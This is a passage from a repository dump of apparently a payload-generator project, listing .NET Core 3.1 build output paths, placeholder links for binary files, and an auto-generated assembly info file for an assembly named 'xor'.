/opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/publish/System.Globalization.Calendars.dll 44 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/publish/System.Globalization.Extensions.dll 45 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/publish/System.Globalization.dll 46 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/publish/System.IO.Compression.Brotli.dll 47 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/publish/System.IO.Compression.FileSystem.dll 48 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/publish/System.IO.Compression.ZipFile.dll 49 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/publish/System.IO.Compression.dll 50 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/publish/System.IO.FileSystem.AccessControl.dll 51 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/publish/System.IO.FileSystem.DriveInfo.dll 52 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/publish/System.IO.FileSystem.Primitives.dll 53 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/publish/System.IO.FileSystem.Watcher.dll 54 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/publish/System.IO.FileSystem.dll 55 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/publish/System.IO.IsolatedStorage.dll 56 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/publish/System.IO.MemoryMappedFiles.dll 57 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/publish/System.IO.Pipes.AccessControl.dll 58 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/publish/System.IO.Pipes.dll 59 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/publish/System.IO.UnmanagedMemoryStream.dll 60 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/publish/System.IO.dll 61 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/publish/System.Linq.Expressions.dll 62 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/publish/System.Linq.Parallel.dll 63 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/publish/System.Linq.Queryable.dll 64 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/publish/System.Linq.dll 65 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/publish/System.Memory.dll 66 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/publish/System.Net.Http.dll 67 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/publish/System.Net.HttpListener.dll 68 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/publish/System.Net.Mail.dll 69 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/publish/System.Net.NameResolution.dll 70 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/publish/System.Net.NetworkInformation.dll 71 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/publish/System.Net.Ping.dll 72 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/publish/System.Net.Primitives.dll 73 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/publish/System.Net.Requests.dll 74 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/publish/System.Net.Security.dll 75 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/publish/System.Net.ServicePoint.dll 76 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/publish/System.Net.Sockets.dll 77 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/publish/System.Net.WebClient.dll 78 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/publish/System.Net.WebHeaderCollection.dll 79 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/publish/System.Net.WebProxy.dll 80 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/publish/System.Net.WebSockets.Client.dll 81 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/publish/System.Net.WebSockets.dll 82 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/publish/System.Net.dll 83 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/publish/System.Numerics.Vectors.dll 84 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/publish/System.Numerics.dll 85 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/publish/System.ObjectModel.dll 86 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/publish/System.Private.DataContractSerialization.dll 87 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/publish/System.Private.Uri.dll 88 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/publish/System.Private.Xml.Linq.dll 89 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/publish/System.Private.Xml.dll 90 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/publish/System.Reflection.DispatchProxy.dll 91 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/publish/System.Reflection.Emit.ILGeneration.dll 92 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/publish/System.Reflection.Emit.Lightweight.dll 93 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/publish/System.Reflection.Emit.dll 94 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/publish/System.Reflection.Extensions.dll 95 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/publish/System.Reflection.Metadata.dll 96 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/publish/System.Reflection.Primitives.dll 97 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/publish/System.Reflection.TypeExtensions.dll 98 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/publish/System.Reflection.dll 99 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/publish/System.Resources.Reader.dll 100 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/publish/System.Resources.ResourceManager.dll 101 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/publish/System.Resources.Writer.dll 102 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/publish/System.Runtime.CompilerServices.Unsafe.dll 103 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/publish/System.Runtime.CompilerServices.VisualC.dll 104 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/publish/System.Runtime.Extensions.dll 105 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/publish/System.Runtime.Handles.dll 106 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/publish/System.Runtime.InteropServices.RuntimeInformation.dll 107 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/publish/System.Runtime.InteropServices.WindowsRuntime.dll 108 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/publish/System.Runtime.InteropServices.dll 109 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/publish/System.Runtime.Intrinsics.dll 110 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/publish/System.Runtime.Loader.dll 111 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/publish/System.Runtime.Numerics.dll 112 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/publish/System.Runtime.Serialization.Formatters.dll 113 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/publish/System.Runtime.Serialization.Json.dll 114 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/publish/System.Runtime.Serialization.Primitives.dll 115 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/publish/System.Runtime.Serialization.Xml.dll 116 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/publish/System.Runtime.Serialization.dll 117 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/publish/System.Runtime.WindowsRuntime.UI.Xaml.dll 118 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/publish/System.Runtime.WindowsRuntime.dll 119 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/publish/System.Runtime.dll 120 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/publish/System.Security.AccessControl.dll 121 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/publish/System.Security.Claims.dll 122 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/publish/System.Security.Cryptography.Algorithms.dll 123 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/publish/System.Security.Cryptography.Cng.dll 124 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/publish/System.Security.Cryptography.Csp.dll 125 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/publish/System.Security.Cryptography.Encoding.dll 126 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/publish/System.Security.Cryptography.OpenSsl.dll 127 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/publish/System.Security.Cryptography.Primitives.dll 128 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/publish/System.Security.Cryptography.X509Certificates.dll 129 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/publish/System.Security.Principal.Windows.dll 130 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/publish/System.Security.Principal.dll 131 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/publish/System.Security.SecureString.dll 132 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/publish/System.Security.dll 133 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/publish/System.ServiceModel.Web.dll 134 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/publish/System.ServiceProcess.dll 135 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/publish/System.Text.Encoding.CodePages.dll 136 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/publish/System.Text.Encoding.Extensions.dll 137 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/publish/System.Text.Encoding.dll 138 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/publish/System.Text.Encodings.Web.dll 139 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/publish/System.Text.Json.dll 140 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/publish/System.Text.RegularExpressions.dll 141 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/publish/System.Threading.Channels.dll 142 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/publish/System.Threading.Overlapped.dll 143 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/publish/System.Threading.Tasks.Dataflow.dll 144 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/publish/System.Threading.Tasks.Extensions.dll 145 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/publish/System.Threading.Tasks.Parallel.dll 146 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/publish/System.Threading.Tasks.dll 147 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/publish/System.Threading.Thread.dll 148 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/publish/System.Threading.ThreadPool.dll 149 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/publish/System.Threading.Timer.dll 150 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/publish/System.Threading.dll 151 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/publish/System.Transactions.Local.dll 152 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/publish/System.Transactions.dll 153 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/publish/System.ValueTuple.dll 154 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/publish/System.Web.HttpUtility.dll 155 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/publish/System.Web.dll 156 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/publish/System.Windows.dll 157 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/publish/System.Xml.Linq.dll 158 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/publish/System.Xml.ReaderWriter.dll 159 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/publish/System.Xml.Serialization.dll 160 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/publish/System.Xml.XDocument.dll 161 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/publish/System.Xml.XPath.XDocument.dll 162 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/publish/System.Xml.XPath.dll 163 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/publish/System.Xml.XmlDocument.dll 164 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/publish/System.Xml.XmlSerializer.dll 165 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/publish/System.Xml.dll 166 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/publish/System.dll 167 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/publish/WindowsBase.dll 168 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/publish/mscorlib.dll 169 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/publish/netstandard.dll 170 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/publish/Microsoft.DiaSymReader.Native.amd64.dll 171 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/publish/SOS_README.md 172 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/publish/System.Private.CoreLib.dll 173 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/publish/api-ms-win-core-console-l1-1-0.dll 174 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/publish/api-ms-win-core-datetime-l1-1-0.dll 175 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/publish/api-ms-win-core-debug-l1-1-0.dll 176 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/publish/api-ms-win-core-errorhandling-l1-1-0.dll 177 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/publish/api-ms-win-core-file-l1-1-0.dll 178 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/publish/api-ms-win-core-file-l1-2-0.dll 179 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/publish/api-ms-win-core-file-l2-1-0.dll 180 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/publish/api-ms-win-core-handle-l1-1-0.dll 181 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/publish/api-ms-win-core-heap-l1-1-0.dll 182 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/publish/api-ms-win-core-interlocked-l1-1-0.dll 183 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/publish/api-ms-win-core-libraryloader-l1-1-0.dll 184 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/publish/api-ms-win-core-localization-l1-2-0.dll 185 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/publish/api-ms-win-core-memory-l1-1-0.dll 186 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/publish/api-ms-win-core-namedpipe-l1-1-0.dll 187 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/publish/api-ms-win-core-processenvironment-l1-1-0.dll 188 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/publish/api-ms-win-core-processthreads-l1-1-0.dll 189 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/publish/api-ms-win-core-processthreads-l1-1-1.dll 190 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/publish/api-ms-win-core-profile-l1-1-0.dll 191 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/publish/api-ms-win-core-rtlsupport-l1-1-0.dll 192 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/publish/api-ms-win-core-string-l1-1-0.dll 193 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/publish/api-ms-win-core-synch-l1-1-0.dll 194 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/publish/api-ms-win-core-synch-l1-2-0.dll 195 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/publish/api-ms-win-core-sysinfo-l1-1-0.dll 196 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/publish/api-ms-win-core-timezone-l1-1-0.dll 197 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/publish/api-ms-win-core-util-l1-1-0.dll 198 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/publish/api-ms-win-crt-conio-l1-1-0.dll 199 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/publish/api-ms-win-crt-convert-l1-1-0.dll 200 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/publish/api-ms-win-crt-environment-l1-1-0.dll 201 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/publish/api-ms-win-crt-filesystem-l1-1-0.dll 202 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/publish/api-ms-win-crt-heap-l1-1-0.dll 203 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/publish/api-ms-win-crt-locale-l1-1-0.dll 204 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/publish/api-ms-win-crt-math-l1-1-0.dll 205 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/publish/api-ms-win-crt-multibyte-l1-1-0.dll 206 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/publish/api-ms-win-crt-private-l1-1-0.dll 207 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/publish/api-ms-win-crt-process-l1-1-0.dll 208 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/publish/api-ms-win-crt-runtime-l1-1-0.dll 209 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/publish/api-ms-win-crt-stdio-l1-1-0.dll 210 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/publish/api-ms-win-crt-string-l1-1-0.dll 211 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/publish/api-ms-win-crt-time-l1-1-0.dll 212 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/publish/api-ms-win-crt-utility-l1-1-0.dll 213 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/publish/clrcompression.dll 214 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/publish/clretwrc.dll 215 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/publish/clrjit.dll 216 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/publish/coreclr.dll 217 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/publish/dbgshim.dll 218 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/publish/hostfxr.dll 219 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/publish/hostpolicy.dll 220 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/publish/mscordaccore.dll 221 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/publish/mscordaccore_amd64_amd64_4.700.21.16201.dll 222 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/publish/mscordbi.dll 223 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/publish/mscorrc.debug.dll 224 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/publish/mscorrc.dll 225 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/publish/ucrtbase.dll 226 | -------------------------------------------------------------------------------- /Payload/obj/Release/netcoreapp3.1/win10-x64/apphost.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/smokeme/payloadGenerator/0dfb54d0d756c6f5163b57081b2ea72016517dce/Payload/obj/Release/netcoreapp3.1/win10-x64/apphost.exe -------------------------------------------------------------------------------- /Payload/obj/Release/netcoreapp3.1/win10-x64/xor.AssemblyInfo.cs: -------------------------------------------------------------------------------- 1 | //------------------------------------------------------------------------------ 2 | // 3 | // This code was generated by a tool. 4 | // 5 | // Changes to this file may cause incorrect behavior and will be lost if 6 | // the code is regenerated. 7 | // 8 | //------------------------------------------------------------------------------ 9 | 10 | using System; 11 | using System.Reflection; 12 | 13 | [assembly: System.Reflection.AssemblyCompanyAttribute("xor")] 14 | [assembly: System.Reflection.AssemblyConfigurationAttribute("Release")] 15 | [assembly: System.Reflection.AssemblyFileVersionAttribute("1.0.0.0")] 16 | [assembly: System.Reflection.AssemblyInformationalVersionAttribute("1.0.0")] 17 | [assembly: System.Reflection.AssemblyProductAttribute("xor")] 18 | [assembly: System.Reflection.AssemblyTitleAttribute("xor")] 19 | [assembly: System.Reflection.AssemblyVersionAttribute("1.0.0.0")] 20 | 21 | // Generated by the MSBuild WriteCodeFragment class. 22 | 23 | -------------------------------------------------------------------------------- /Payload/obj/Release/netcoreapp3.1/win10-x64/xor.AssemblyInfoInputs.cache: -------------------------------------------------------------------------------- 1 | eaccaa501d6980293030cd1860b2a38ecc4947ca 2 | -------------------------------------------------------------------------------- /Payload/obj/Release/netcoreapp3.1/win10-x64/xor.assets.cache: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/smokeme/payloadGenerator/0dfb54d0d756c6f5163b57081b2ea72016517dce/Payload/obj/Release/netcoreapp3.1/win10-x64/xor.assets.cache -------------------------------------------------------------------------------- /Payload/obj/Release/netcoreapp3.1/win10-x64/xor.csproj.CopyComplete: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/smokeme/payloadGenerator/0dfb54d0d756c6f5163b57081b2ea72016517dce/Payload/obj/Release/netcoreapp3.1/win10-x64/xor.csproj.CopyComplete -------------------------------------------------------------------------------- /Payload/obj/Release/netcoreapp3.1/win10-x64/xor.csproj.CoreCompileInputs.cache: -------------------------------------------------------------------------------- 1 | 3e59c40098baeab4e4dc57719d13103cfb98b407 2 | -------------------------------------------------------------------------------- /Payload/obj/Release/netcoreapp3.1/win10-x64/xor.csproj.FileListAbsolute.txt: -------------------------------------------------------------------------------- 1 | /opt/Generator/Payload/obj/Release/netcoreapp3.1/win10-x64/xor.csprojAssemblyReference.cache 2 | /opt/Generator/Payload/obj/Release/netcoreapp3.1/win10-x64/xor.AssemblyInfoInputs.cache 3 | /opt/Generator/Payload/obj/Release/netcoreapp3.1/win10-x64/xor.AssemblyInfo.cs 4 | /opt/Generator/Payload/obj/Release/netcoreapp3.1/win10-x64/xor.csproj.CoreCompileInputs.cache 5 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/xor.exe 6 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/xor.deps.json 7 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/xor.runtimeconfig.json 8 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/xor.runtimeconfig.dev.json 9 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/xor.dll 10 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/xor.pdb 11 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/Microsoft.CSharp.dll 12 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/Microsoft.VisualBasic.Core.dll 13 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/Microsoft.VisualBasic.dll 14 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/Microsoft.Win32.Primitives.dll 15 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/Microsoft.Win32.Registry.dll 16 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/System.AppContext.dll 17 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/System.Buffers.dll 18 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/System.Collections.Concurrent.dll 19 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/System.Collections.Immutable.dll 20 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/System.Collections.NonGeneric.dll 21 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/System.Collections.Specialized.dll 22 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/System.Collections.dll 23 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/System.ComponentModel.Annotations.dll 24 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/System.ComponentModel.DataAnnotations.dll 25 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/System.ComponentModel.EventBasedAsync.dll 26 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/System.ComponentModel.Primitives.dll 27 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/System.ComponentModel.TypeConverter.dll 28 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/System.ComponentModel.dll 29 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/System.Configuration.dll 30 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/System.Console.dll 31 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/System.Core.dll 32 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/System.Data.Common.dll 33 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/System.Data.DataSetExtensions.dll 34 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/System.Data.dll 35 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/System.Diagnostics.Contracts.dll 36 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/System.Diagnostics.Debug.dll 37 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/System.Diagnostics.DiagnosticSource.dll 38 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/System.Diagnostics.FileVersionInfo.dll 39 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/System.Diagnostics.Process.dll 40 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/System.Diagnostics.StackTrace.dll 41 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/System.Diagnostics.TextWriterTraceListener.dll 42 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/System.Diagnostics.Tools.dll 43 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/System.Diagnostics.TraceSource.dll 44 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/System.Diagnostics.Tracing.dll 45 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/System.Drawing.Primitives.dll 46 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/System.Drawing.dll 47 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/System.Dynamic.Runtime.dll 48 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/System.Globalization.Calendars.dll 49 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/System.Globalization.Extensions.dll 50 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/System.Globalization.dll 51 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/System.IO.Compression.Brotli.dll 52 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/System.IO.Compression.FileSystem.dll 53 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/System.IO.Compression.ZipFile.dll 54 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/System.IO.Compression.dll 55 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/System.IO.FileSystem.AccessControl.dll 56 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/System.IO.FileSystem.DriveInfo.dll 57 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/System.IO.FileSystem.Primitives.dll 58 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/System.IO.FileSystem.Watcher.dll 59 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/System.IO.FileSystem.dll 60 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/System.IO.IsolatedStorage.dll 61 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/System.IO.MemoryMappedFiles.dll 62 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/System.IO.Pipes.AccessControl.dll 63 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/System.IO.Pipes.dll 64 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/System.IO.UnmanagedMemoryStream.dll 65 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/System.IO.dll 66 | 